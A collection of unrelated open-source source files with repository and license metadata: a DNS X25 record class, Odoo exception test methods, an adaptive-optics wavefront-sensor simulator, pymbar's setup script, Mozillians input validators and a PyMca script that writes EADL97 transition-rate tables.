gpl-2.0
|
edumatos/namebench
|
nb_third_party/dns/rdtypes/ANY/X25.py
|
248
|
2123
|
# Copyright (C) 2003-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import dns.exception
import dns.rdata
import dns.tokenizer
class X25(dns.rdata.Rdata):
"""X25 record
@ivar address: the PSDN address
@type address: string
@see: RFC 1183"""
__slots__ = ['address']
def __init__(self, rdclass, rdtype, address):
super(X25, self).__init__(rdclass, rdtype)
self.address = address
def to_text(self, origin=None, relativize=True, **kw):
return '"%s"' % dns.rdata._escapify(self.address)
def from_text(cls, rdclass, rdtype, tok, origin = None, relativize = True):
address = tok.get_string()
tok.get_eol()
return cls(rdclass, rdtype, address)
from_text = classmethod(from_text)
def to_wire(self, file, compress = None, origin = None):
l = len(self.address)
assert l < 256
byte = chr(l)
file.write(byte)
file.write(self.address)
def from_wire(cls, rdclass, rdtype, wire, current, rdlen, origin = None):
l = ord(wire[current])
current += 1
rdlen -= 1
if l != rdlen:
raise dns.exception.FormError
address = wire[current : current + l]
return cls(rdclass, rdtype, address)
from_wire = classmethod(from_wire)
def _cmp(self, other):
return cmp(self.address, other.address)
|
apache-2.0
|
apocalypsebg/odoo
|
openerp/addons/test_exceptions/models.py
|
336
|
3186
|
# -*- coding: utf-8 -*-
import openerp.exceptions
import openerp.osv.orm
import openerp.osv.osv
import openerp.tools.safe_eval
class m(openerp.osv.osv.Model):
""" This model exposes a few methods that will raise the different
exceptions that must be handled by the server (and its RPC layer)
and the clients.
"""
_name = 'test.exceptions.model'
def generate_except_osv(self, cr, uid, ids, context=None):
# title is ignored in the new (6.1) exceptions
raise openerp.osv.osv.except_osv('title', 'description')
def generate_except_orm(self, cr, uid, ids, context=None):
# title is ignored in the new (6.1) exceptions
raise openerp.osv.orm.except_orm('title', 'description')
def generate_warning(self, cr, uid, ids, context=None):
raise openerp.exceptions.Warning('description')
def generate_redirect_warning(self, cr, uid, ids, context=None):
dummy, action_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'test_exceptions', 'action_test_exceptions')
raise openerp.exceptions.RedirectWarning('description', action_id, 'go to the redirection')
def generate_access_denied(self, cr, uid, ids, context=None):
raise openerp.exceptions.AccessDenied()
def generate_access_error(self, cr, uid, ids, context=None):
raise openerp.exceptions.AccessError('description')
def generate_exc_access_denied(self, cr, uid, ids, context=None):
raise Exception('AccessDenied')
def generate_undefined(self, cr, uid, ids, context=None):
self.surely_undefined_symbol
def generate_except_osv_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_except_osv, context)
def generate_except_orm_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_except_orm, context)
def generate_warning_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_warning, context)
def generate_redirect_warning_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_redirect_warning, context)
def generate_access_denied_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_access_denied, context)
def generate_access_error_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_access_error, context)
def generate_exc_access_denied_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_exc_access_denied, context)
def generate_undefined_safe_eval(self, cr, uid, ids, context=None):
self.generate_safe_eval(cr, uid, ids, self.generate_undefined, context)
def generate_safe_eval(self, cr, uid, ids, f, context):
globals_dict = { 'generate': lambda *args: f(cr, uid, ids, context) }
openerp.tools.safe_eval.safe_eval("generate()", mode='exec', globals_dict=globals_dict)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
andrewpaulreeves/soapy
|
soapy/wfs/wfs.py
|
2
|
20129
|
#Copyright Durham University and Andrew Reeves
#2014
# This file is part of soapy.
# soapy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# soapy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with soapy. If not, see <http://www.gnu.org/licenses/>.
"""
The Soapy WFS module.
This module contains a number of classes which simulate different adaptive optics wavefront sensor (WFS) types. All wavefront sensor classes can inherit from the base ``WFS`` class. The class provides the methods required to calculate phase over a WFS pointing in a given WFS direction and accounts for Laser Guide Star (LGS) geometry such as cone effect and elongation. This is If only pupil images (or complex amplitudes) are required, then this class can be used stand-alone.
Example:
Make configuration objects::
from soapy import WFS, confParse
config = confParse.Configurator("config_file.py")
config.loadSimParams()
Initialise the wave-front sensor::
wfs = WFS.WFS(config, 0 mask)
Set the WFS scrns (these should be made in advance, perhaps by the :py:mod:`soapy.atmosphere` module). Then run the WFS::
wfs.scrns = phaseScrnList
wfs.makePhase()
Now you can view data from the WFS frame::
frameEField = wfs.EField
A Shack-Hartmann WFS is also included in the module, this contains further methods to make the focal plane, then calculate the slopes to send to the reconstructor.
Example:
Using the config objects from above...::
shWfs = WFS.ShackHartmann(config, 0, mask)
As we are using a full WFS with focal plane making methods, the WFS base classes ``frame`` method can be used to take a frame from the WFS::
slopes = shWfs.frame(phaseScrnList)
All the data from that WFS frame is available for inspection. For instance, to obtain the electric field across the WFS and the image seen by the WFS detector::
EField = shWfs.EField
wfsDetector = shWfs.wfsDetectorPlane
Adding new WFSs
^^^^^^^^^^^^^^^
New WFS classes should inherit the ``WFS`` class, then create methods which deal with creating the focal plane and making a measurement from it. To make use of the base-classes ``frame`` method, which will run the WFS entirely, the new class must contain the following methods::
calcFocalPlane(self)
integrateDetectorPlane(self)
readDetectorPlane(self)
calculateSlopes(self)
The Final ``calculateSlopes`` method must set ``self.slopes`` to be the measurements made by the WFS. If LGS elongation is to be used for the new WFS, create a ``detectorPlane``, which is added to for each LGS elongation propagation. Have a look at the code for the ``Shack-Hartmann`` and experimental ``Pyramid`` WFSs to get some ideas on how to do this.
:Author:
Andrew Reeves
"""
import numpy
import numpy.random
import aotools
from .. import AOFFT, LGS, logger, lineofsight_legacy
# xrange now just "range" in python3.
# Following code means fastest implementation used in 2 and 3
try:
xrange
except NameError:
xrange = range
# The data type of data arrays (complex and real respectively)
CDTYPE = numpy.complex64
DTYPE = numpy.float32
RAD2ASEC = 206264.849159
ASEC2RAD = 1./RAD2ASEC
class WFS(object):
'''
A WFS class.
This is a base class which contains methods to initialise the WFS,
and calculate the phase across the WFSs input aperture, given the WFS
guide star geometry.
Parameters:
soapy_config (ConfigObj): The soapy configuration object
nWfs (int): The ID number of this WFS
mask (ndarray, optional): An array or size (simConfig.simSize, simConfig.simSize) which is 1 at the telescope aperture and 0 else-where.
'''
def __init__(
self, soapy_config, n_wfs=0, mask=None):
self.soapy_config = soapy_config
self.config = self.wfsConfig = soapy_config.wfss[n_wfs] # For compatability
self.lgsConfig = self.config.lgs
# Sort out some required, static, parameters
self.pupil_size = self.soapy_config.sim.pupilSize
self.sim_size = self.soapy_config.sim.simSize
self.phase_scale = 1./self.soapy_config.sim.pxlScale
self.sim_pad = self.soapy_config.sim.simPad
self.screen_size = self.soapy_config.sim.scrnSize
self.telescope_diameter = self.soapy_config.tel.telDiam
self.wavelength = self.config.wavelength
self.threads = self.soapy_config.sim.threads
# If supplied use the mask
if numpy.any(mask):
self.mask = mask
# Else we'll just make a circle
else:
self.mask = aotools.circle(self.pupil_size/2., self.sim_size)
self.iMat = False
# Init the line of sight
self.initLos()
self.calcInitParams()
# If GS not at infinity, find meta-pupil radii for each layer
# if self.config.GSHeight != 0:
# self.radii = self.los.findMetaPupilSizes(self.config.GSHeight)
# else:
# self.radii = None
# Init LGS, FFTs and allocate some data arrays
self.initFFTs()
if self.lgsConfig and self.config.lgs:
self.initLGS()
self.allocDataArrays()
self.calcTiltCorrect()
self.getStatic()
# base WFS makes no measurements....
# self.n_measurements = 0
############################################################
# Initialisation routines
def setMask(self, mask):
"""
Sets the pupil mask as seen by the WFS.
This method can be called during a simulation
"""
# If supplied use the mask
if numpy.any(mask):
self.mask = mask
else:
self.mask = aotools.circle(
self.pupil_size/2., self.sim_size,
)
def calcInitParams(self, phaseSize=None):
self.los.calcInitParams(nx_out_pixels=phaseSize)
def initFFTs(self):
pass
def allocDataArrays(self):
pass
def initLos(self):
"""
Initialises the ``LineOfSight`` object, which gets the phase or EField in a given direction through turbulence.
"""
self.los = lineofsight_legacy.LineOfSight(
self.config, self.soapy_config,
propagationDirection="down")
def initLGS(self):
"""
Initialises the LGS objects for the WFS
Creates and initialises the LGS objects if the WFS GS is a LGS. This
included calculating the phases additions which are required if the
LGS is elongated based on the depth of the elongation and the launch
position. Note that if the GS is at infinity, elongation is not possible
and a warning is logged.
"""
# Choose the correct LGS object, either with physical or geometric
# or geometric propagation.
if self.lgsConfig.uplink:
lgsObj = eval("LGS.LGS_{}".format(self.lgsConfig.propagationMode))
self.lgs = lgsObj(self.config, self.soapy_config)
else:
self.lgs = None
self.lgsLaunchPos = None
self.elong = 0
self.elongLayers = 0
if self.config.lgs:
self.lgsLaunchPos = self.lgsConfig.launchPosition
# LGS Elongation##############################
if (self.config.GSHeight!=0 and
self.lgsConfig.elongationDepth!=0):
self.elong = self.lgsConfig.elongationDepth
self.elongLayers = self.lgsConfig.elongationLayers
# Get Heights of elong layers
self.elongHeights = numpy.linspace(
self.config.GSHeight-self.elong/2.,
self.config.GSHeight+self.elong/2.,
self.elongLayers
)
# Calculate the zernikes to add
self.elongZs = aotools.zernikeArray([2,3,4], self.pupil_size)
# Calculate the radii of the metapupii at for different elong
# Layer heights
# Also calculate the required phase addition for each layer
self.elongRadii = {}
self.elongPos = {}
self.elongPhaseAdditions = numpy.zeros(
(self.elongLayers, self.los.nx_out_pixels, self.los.nx_out_pixels))
for i in xrange(self.elongLayers):
self.elongRadii[i] = self.los.findMetaPupilSizes(
float(self.elongHeights[i]))
self.elongPhaseAdditions[i] = self.calcElongPhaseAddition(i)
self.elongPos[i] = self.calcElongPos(i)
# self.los.metaPupilPos = self.elongPos
logger.debug(
'Elong Meta Pupil Pos: {}'.format(self.los.metaPupilPos))
# If GS at infinity cant do elongation
elif (self.config.GSHeight==0 and
self.lgsConfig.elongationDepth!=0):
logger.warning("Not able to implement LGS Elongation as GS at infinity")
def calcTiltCorrect(self):
pass
def getStatic(self):
self.staticData = None
def calcElongPhaseAddition(self, elongLayer):
"""
Calculates the phase required to emulate layers on an elongated source
For each 'elongation layer' a phase addition is calculated which
accounts for the difference in height from the nominal GS height where
the WFS is focussed, and accounts for the tilt seen if the LGS is
launched off-axis.
Parameters:
elongLayer (int): The number of the elongation layer
Returns:
ndarray: The phase addition required for that layer.
"""
# Calculate the path difference between the central GS height and the
# elongation "layer"
# Define these to make it easier
h = self.elongHeights[elongLayer]
dh = h - self.config.GSHeight
H = float(self.lgsConfig.height)
d = numpy.array(self.lgsLaunchPos).astype('float32') * self.los.telDiam/2.
D = self.telescope_diameter
theta = (d.astype("float")/H) - self.config.GSPosition
# for the focus terms....
focalPathDiff = (2*numpy.pi/self.wfsConfig.wavelength) * ((
((self.telescope_diameter/2.)**2 + (h**2) )**0.5\
- ((self.telescope_diameter/2.)**2 + (H)**2 )**0.5 ) - dh)
# For tilt terms.....
tiltPathDiff = (2*numpy.pi/self.wfsConfig.wavelength) * (
numpy.sqrt( (dh+H)**2. + ( (dh+H)*theta-d-D/2.)**2 )
+ numpy.sqrt( H**2 + (D/2. - d + H*theta)**2 )
- numpy.sqrt( H**2 + (H*theta - d - D/2.)**2)
- numpy.sqrt( (dh+H)**2 + (D/2. - d + (dh+H)*theta )**2))
phaseAddition = numpy.zeros(
(self.pupil_size, self.pupil_size))
phaseAddition +=((self.elongZs[2]/self.elongZs[2].max())
* focalPathDiff )
# X,Y tilt
phaseAddition += ((self.elongZs[0]/self.elongZs[0].max())
*tiltPathDiff[0] )
phaseAddition += ((self.elongZs[1]/self.elongZs[1].max()) *tiltPathDiff[1])
# Pad from pupilSize to simSize
pad = ((self.sim_pad,)*2, (self.sim_pad,)*2)
phaseAddition = numpy.pad(phaseAddition, pad, mode="constant")
phaseAddition = interp.zoom(phaseAddition, self.los.nx_out_pixels)
return phaseAddition
def calcElongPos(self, elongLayer):
"""
Calculates the difference in GS position for each elongation layer
only makes a difference if LGS launched off-axis
Parameters:
elongLayer (int): which elongation layer
Returns:
float: The effective position of that layer GS on the simulation phase grid
"""
h = self.elongHeights[elongLayer] # height of elonglayer
dh = h - self.config.GSHeight # delta height from GS Height
H = float(self.config.GSHeight) # Height of GS
# Position of launch in m
xl = numpy.array(self.lgsLaunchPos) * self.telescope_diameter/2.
# GS Pos in radians
GSPos = numpy.array(self.config.GSPosition) * RAD2ASEC
# difference in angular Pos for that height layer in rads
theta_n = GSPos - ((dh*xl)/ (H*(H+dh)))
# metres from on-axis point of each elongation point
elongPos = (GSPos + theta_n) * RAD2ASEC
return elongPos
def zeroPhaseData(self):
self.los.EField[:] = 0
self.los.phase[:] = 0
def makeElongationFrame(self, correction=None):
"""
Find the focal plane resulting from an elongated guide star, such as LGS.
Runs the phase stacking and propagation routines multiple times with different GS heights, positions and/or aberrations to simulation the effect of a number of points in an elongation guide star.
"""
# Loop over the elongation layers
for i in xrange(self.elongLayers):
logger.debug('Elong layer: {}'.format(i))
# Reset the phase propagation routines (not the detector though)
self.zeroData(FP=False)
# Find the phase from that elongation layer (with different cone effect radii and potentially angular position)
self.los.makePhase(self.elongRadii[i], apos=self.elongPos[i])
# Make a copy of the uncorrectedPhase for plotting
self.uncorrectedPhase = self.los.phase.copy()/self.los.phs2Rad
# Add the effect of the defocus and possibly tilt
self.los.EField *= numpy.exp(1j*self.elongPhaseAdditions[i])
self.los.phase += self.elongPhaseAdditions[i]
# Apply any correction
if correction is not None:
self.los.performCorrection(correction)
# Add onto the focal plane with that layers intensity
self.calcFocalPlane(intensity=self.lgsConfig.naProfile[i])
def frame(self, scrns, phase_correction=None, read=True, iMatFrame=False):
'''
Runs one WFS frame
Runs a single frame of the WFS with a given set of phase screens and
some optional correction. If elongation is set, will run the phase
calculating and focal plane making methods multiple times for a few
different heights of LGS, then sum these onto a ``wfsDetectorPlane``.
Parameters:
scrns (list): A list or dict containing the phase screens
correction (ndarray, optional): The correction term to take from the phase screens before the WFS is run.
read (bool, optional): Should the WFS be read out? if False, then WFS image is calculated but slopes not calculated. defaults to True.
iMatFrame (bool, optional): If True, will assume an interaction matrix is being measured. Turns off some AO loop features before running
Returns:
ndarray: WFS Measurements
'''
#If iMatFrame, turn off unwanted effects
if iMatFrame:
self.iMat = True
removeTT = self.config.removeTT
self.config.removeTT = False
photonNoise = self.config.photonNoise
self.config.photonNoise = False
eReadNoise = self.config.eReadNoise
self.config.eReadNoise = 0
self.zeroData(detector=read, FP=False)
self.los.frame(scrns)
# If LGS elongation simulated
if self.config.lgs and self.elong!=0:
self.makeElongationFrame(phase_correction)
# If no elongation
else:
self.uncorrectedPhase = self.los.phase.copy()/self.los.phs2Rad
if phase_correction is not None:
self.los.performCorrection(phase_correction)
self.calcFocalPlane()
self.integrateDetectorPlane()
if read:
self.readDetectorPlane()
self.calculateSlopes()
self.zeroData(detector=False)
# Turn back on stuff disabled for iMat
if iMatFrame:
self.iMat=False
self.config.removeTT = removeTT
self.config.photonNoise = photonNoise
self.config.eReadNoise = eReadNoise
# Check that slopes aint `nan`s. Set to 0 if so
# if numpy.any(numpy.isnan(self.slopes)):
# self.slopes[:] = 0
if numpy.any(numpy.isnan(self.slopes)):
numpy.nan_to_num(self.slopes)
if read:
return self.slopes
else:
return numpy.zeros((self.n_measurements), dtype=float)
def simple_frame(self, phase, iMatFrame=False):
"""
Runs simple WFS frame with no Line of Sight propagation
The WFS is run by simply getting the measurements relating to a
2d phase pattern. This does not account for hte altitude of the
turbulence, or for correction applied by a DM.
Parameters:
phase (ndarray): array of phase of size scrnSize x scrnSize in nm
Returns:
ndarray: WFS measurements
"""
self.zeroData()
#If iMatFrame, turn off unwanted effects
if iMatFrame:
self.iMat = True
removeTT = self.config.removeTT
self.config.removeTT = False
photonNoise = self.config.photonNoise
self.config.photonNoise = False
eReadNoise = self.config.eReadNoise
self.config.eReadNoise = 0
self.los.phase = phase * self.los.phs2Rad
self.calcFocalPlane()
self.integrateDetectorPlane()
self.readDetectorPlane()
self.calculateSlopes()
# Turn back on stuff disabled for iMat
if iMatFrame:
self.iMat=False
self.config.removeTT = removeTT
self.config.photonNoise = photonNoise
self.config.eReadNoise = eReadNoise
# Check that slopes aint `nan`s. Set to 0 if so
# if numpy.any(numpy.isnan(self.slopes)):
# self.slopes[:] = 0
if numpy.any(numpy.isnan(self.slopes)):
numpy.nan_to_num(self.slopes)
return self.slopes
def addPhotonNoise(self):
"""
Add photon noise to ``wfsDetectorPlane`` using ``numpy.random.poisson``
"""
self.wfsDetectorPlane = numpy.random.poisson(
self.wfsDetectorPlane).astype(DTYPE)
def addReadNoise(self):
"""
Adds read noise to ``wfsDetectorPlane using ``numpy.random.normal``.
This generates a normal (guassian) distribution of random numbers to
add to the detector. Any CCD bias is assumed to have been removed, so
the distribution is centred around 0. The width of the distribution
is determined by the value `eReadNoise` set in the WFS configuration.
"""
self.wfsDetectorPlane += numpy.random.normal(
0, self.config.eReadNoise, self.wfsDetectorPlane.shape
)
def calcFocalPlane(self, intensity=None):
pass
def integrateDetectorPlane(self):
pass
def readDetectorPlane(self):
pass
def LGSUplink(self):
pass
def calculateSlopes(self):
self.slopes = self.los.EField
def zeroData(self, detector=True, FP=True):
#self.zeroPhaseData()
pass
@property
def EField(self):
return self.los.EField
@EField.setter
def EField(self, EField):
self.los.EField = EField
|
gpl-3.0
|
choderalab/pymbar
|
setup.py
|
2
|
5204
|
"""
The pymbar package contains the pymbar suite of tools for the analysis of
simulated and experimental data with the multistate Bennett acceptance
ratio (MBAR) estimator.
"""
from distutils.core import setup
from setuptools import setup, Extension
import numpy
import os
import subprocess
import six
##########################
VERSION = "3.0.5"
ISRELEASED = False
__version__ = VERSION
##########################
################################################################################
# Writing version control information to the module
################################################################################
def git_version():
# Return the git revision as a string
# copied from numpy setup.py
def _minimal_ext_cmd(cmd):
# construct minimal environment
env = {}
for k in ['SYSTEMROOT', 'PATH']:
v = os.environ.get(k)
if v is not None:
env[k] = v
# LANGUAGE is used on win32
env['LANGUAGE'] = 'C'
env['LANG'] = 'C'
env['LC_ALL'] = 'C'
out = subprocess.Popen(
cmd, stdout=subprocess.PIPE, env=env).communicate()[0]
return out
try:
out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])
GIT_REVISION = out.strip().decode('ascii')
except OSError:
GIT_REVISION = 'Unknown'
return GIT_REVISION
def write_version_py(filename='pymbar/version.py'):
cnt = """
# This file is automatically generated by setup.py
short_version = '%(version)s'
version = '%(version)s'
full_version = '%(full_version)s'
git_revision = '%(git_revision)s'
release = %(isrelease)s
if not release:
version = full_version
"""
# Adding the git rev number needs to be done inside write_version_py(),
# otherwise the import of numpy.version messes up the build under Python 3.
FULLVERSION = VERSION
if os.path.exists('.git'):
GIT_REVISION = git_version()
else:
GIT_REVISION = 'Unknown'
if not ISRELEASED:
FULLVERSION += '.dev-' + GIT_REVISION[:7]
a = open(filename, 'w')
try:
a.write(cnt % {'version': VERSION,
'full_version': FULLVERSION,
'git_revision': GIT_REVISION,
'isrelease': str(ISRELEASED)})
finally:
a.close()
################################################################################
# Installation
################################################################################
write_version_py()
CMBAR = Extension('_pymbar',
sources = ["pymbar/_pymbar.c"],
extra_compile_args=["-std=c99","-O2","-shared","-msse2","-msse3"],
include_dirs = [numpy.get_include(),numpy.get_include()+"/numpy/"]
)
def buildKeywordDictionary():
from distutils.core import Extension
setupKeywords = {}
setupKeywords["name"] = "pymbar"
setupKeywords["version"] = VERSION
setupKeywords["author"] = "Levi N. Naden and Michael R. Shirts and John D. Chodera"
setupKeywords["author_email"] = "levi.naden@choderalab.org, michael.shirts@virginia.edu, john.chodera@choderalab.org"
setupKeywords["license"] = "MIT"
setupKeywords["url"] = "http://github.com/choderalab/pymbar"
setupKeywords["download_url"] = "http://github.com/choderalab/pymbar"
setupKeywords["packages"] = ['pymbar', 'pymbar.testsystems', 'pymbar.tests']
setupKeywords["package_dir"] = {'pymbar' : 'pymbar', 'pymbar.tests' : 'pymbar/tests'}
setupKeywords["zip_safe"] = False
#setupKeywords["py_modules"] = ["pymbar", "timeseries", "testsystems", "confidenceintervals"]
setupKeywords["data_files"] = [('pymbar', ["pymbar/_pymbar.c"])] # Ensures the _pymbar.c files are shipped regardless of Py Version
setupKeywords["ext_modules"] = [CMBAR] if six.PY2 else []
# setupKeywords["test_suite"] = "tests" # requires we migrate to setuptools
setupKeywords["platforms"] = ["Linux", "Mac OS X", "Windows"]
setupKeywords["description"] = "Python implementation of the multistate Bennett acceptance ratio (MBAR) method."
setupKeywords["requires"] = ["numpy", "scipy", "nose", "numexpr"]
setupKeywords["long_description"] = """
Pymbar (https://simtk.org/home/pymbar) is a library
that provides tools for optimally combining simulations
from multiple thermodynamic states using maximum likelihood
methods to compute free energies (normalization constants)
and expectation values from all of the samples simultaneously.
"""
outputString=""
firstTab = 40
secondTab = 60
for key in sorted(setupKeywords.keys()):
value = setupKeywords[key]
outputString += key.rjust(firstTab) + str( value ).rjust(secondTab) + "\n"
print("%s" % outputString)
#get_config_var(None) # this line is necessary to fix the imports Mac OS X
return setupKeywords
def main():
setupKeywords = buildKeywordDictionary()
setup(**setupKeywords)
if __name__ == '__main__':
main()
|
mit
|
akatsoulas/mozillians
|
mozillians/phonebook/validators.py
|
2
|
3254
|
import re
from django.apps import apps
from django.core.validators import EmailValidator, URLValidator
from django.forms import ValidationError
from django.utils.translation import ugettext as _
def validate_twitter(username):
"""Return a twitter username given '@' or http(s) strings."""
if username:
username = re.sub(r'https?://(www\.)?twitter\.com/|@', '', username)
# Twitter accounts must be alphanumeric ASCII including underscore, and <= 15 chars.
# https://support.twitter.com/articles/101299-why-can-t-i-register-certain-usernames
if len(username) > 15:
raise ValidationError(_('Twitter usernames cannot be longer than 15 characters.'))
if not re.match(r'^\w+$', username):
raise ValidationError(_('Twitter usernames must contain only alphanumeric'
' characters and the underscore.'))
return username
def validate_linkedin(url):
"""Return the linkedin username from the url or the link"""
if 'view?id' not in url:
nick = url.rsplit('/', 1)[-1]
return nick
return url
def validate_username(username):
"""Validate username.
Import modules here to prevent dependency breaking.
"""
username = username.lower()
UsernameBlacklist = apps.get_model('users', 'UsernameBlacklist')
if UsernameBlacklist.objects.filter(value=username, is_regex=False).exists():
return False
for regex_value in UsernameBlacklist.objects.filter(is_regex=True):
if re.match(regex_value.value, username):
return False
return True
def validate_website(url):
"""Validate and return a properly formatted website url."""
validate_url = URLValidator()
if url and '://' not in url:
url = u'http://%s' % url
try:
validate_url(url)
except ValidationError:
raise ValidationError(_('Enter a valid URL.'))
return url
def validate_username_not_url(username):
"""Validate that a username is not a URL."""
if username.startswith('http://') or username.startswith('https://'):
raise ValidationError(_('This field requires an identifier, not a URL.'))
return username
def validate_email(value):
"""Validate that a username is email like."""
_validate_email = EmailValidator()
try:
_validate_email(value)
except ValidationError:
raise ValidationError(_('Enter a valid email address.'))
return value
def validate_phone_number(value):
"""Validate that a phone number is in international format. (5-15 characters)."""
value = value.replace(' ', '')
value = re.sub(r'^00', '+', value)
# Ensure that there are 5 to 15 digits
pattern = re.compile(r'^\+\d{5,15}$')
if not pattern.match(value):
raise ValidationError(_('Please enter a valid phone number in international format '
'(e.g. +1 555 555 5555)'))
return value
def validate_discord(value):
"""Validate that a username matches the Discord format of <username>#0000."""
if not re.match(r'^.+#[0-9]{4}$', value):
raise ValidationError(_('Expecting a Discord username with tag (e.g. mozillian#0001)'))
return value
|
bsd-3-clause
|
tonnrueter/pymca_devel
|
PyMca/EPDL97/GenerateEADLShellNonradiativeRates.py
|
1
|
6235
|
__doc__= "Generate specfiles with EADL97 shell transition probabilities"
import os
import sys
import EADLParser
Elements = ['H', 'He',
'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne',
'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe',
'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se',
'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo',
'Tc', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn',
'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce',
'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy',
'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W',
'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb',
'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th',
'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf',
'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg',
'Bh', 'Hs', 'Mt']
def getHeader(filename):
text = '#F %s\n' % filename
text += '#U00 This file is a conversion to specfile format of \n'
text += '#U01 directly extracted EADL97 nonradiative transition probabilities.\n'
text += '#U02 EADL itself can be found at:\n'
text += '#U03 http://www-nds.iaea.org/epdl97/libsall.htm\n'
text += '#U04 The code used to generate this file has been:\n'
text += '#U05 %s\n' % os.path.basename(__file__)
text += '#U06\n'
text += '\n'
return text
shellList = EADLParser.getBaseShellList()
workingShells = ['K', 'L1', 'L2', 'L3', 'M1', 'M2', 'M3', 'M4', 'M5']
for shell in workingShells:
fname = "EADL97_%sShellNonradiativeRates.dat" % shell[0]
print("fname = %s" % fname)
if shell in ['K', 'L1', 'M1']:
if os.path.exists(fname):
os.remove(fname)
nscan = 0
outfile = open(fname, 'wb')
tmpText = getHeader(fname)
if sys.version < '3.0':
outfile.write(tmpText)
else:
outfile.write(tmpText.encode('UTF-8'))
nscan += 1
for i in range(1,101):
print("Z = %d, Element = %s" % (i, Elements[i-1]))
element = Elements[i-1]
ddict = {}
for key0 in shellList:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
if shell in [key0.split()[0], key1.split()[0]]:
continue
ddict[key] = [0.0, 0.0]
try:
ddict = EADLParser.getNonradiativeTransitionProbabilities(\
Elements.index(element)+1,
shell=shell)
print("%s Shell nonradiative emission probabilities " % shell)
except IOError:
#This happens when reading elements not presenting the transitions
pass
#continue
if i == 1:
#generate the labels
nTransitions = 0
tmpText = '#L Z TOTAL'
for key0 in workingShells:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
tmpText += ' %s' % (key)
nTransitions += 1
text = '#S %d %s-Shell nonradiative rates\n' % (nscan, shell)
text += '#N %d\n' % (2 + nTransitions)
text += tmpText + '\n'
else:
text = ''
# this loop calculates the totals, because it cannot be deduced from the subset
# transitions written in the file
total = 0.0
for key0 in shellList:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
total += ddict.get(key, [0.0, 0.0])[0]
text += '%d %.7E' % (i, total)
for key0 in workingShells:
tmpKey = key0.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
for key1 in shellList:
tmpKey = key1.split()[0]
if tmpKey in workingShells:
if workingShells.index(tmpKey) <= workingShells.index(shell):
continue
key = "%s-%s%s" % (shell, key0.split()[0], key1.split()[0])
valueToWrite = ddict.get(key, [0.0, 0.0])[0]
if valueToWrite == 0.0:
text += ' 0.0'
else:
text += ' %.7E' % valueToWrite
text += '\n'
if sys.version < '3.0':
outfile.write(text)
else:
outfile.write(text.encode('UTF-8'))
if sys.version < '3.0':
outfile.write('\n')
else:
outfile.write('\n'.encode('UTF-8'))
if sys.version < '3.0':
outfile.write('\n')
else:
outfile.write('\n'.encode('UTF-8'))
outfile.close()
|
gpl-2.0
|
cloudbase/nova-virtualbox
|
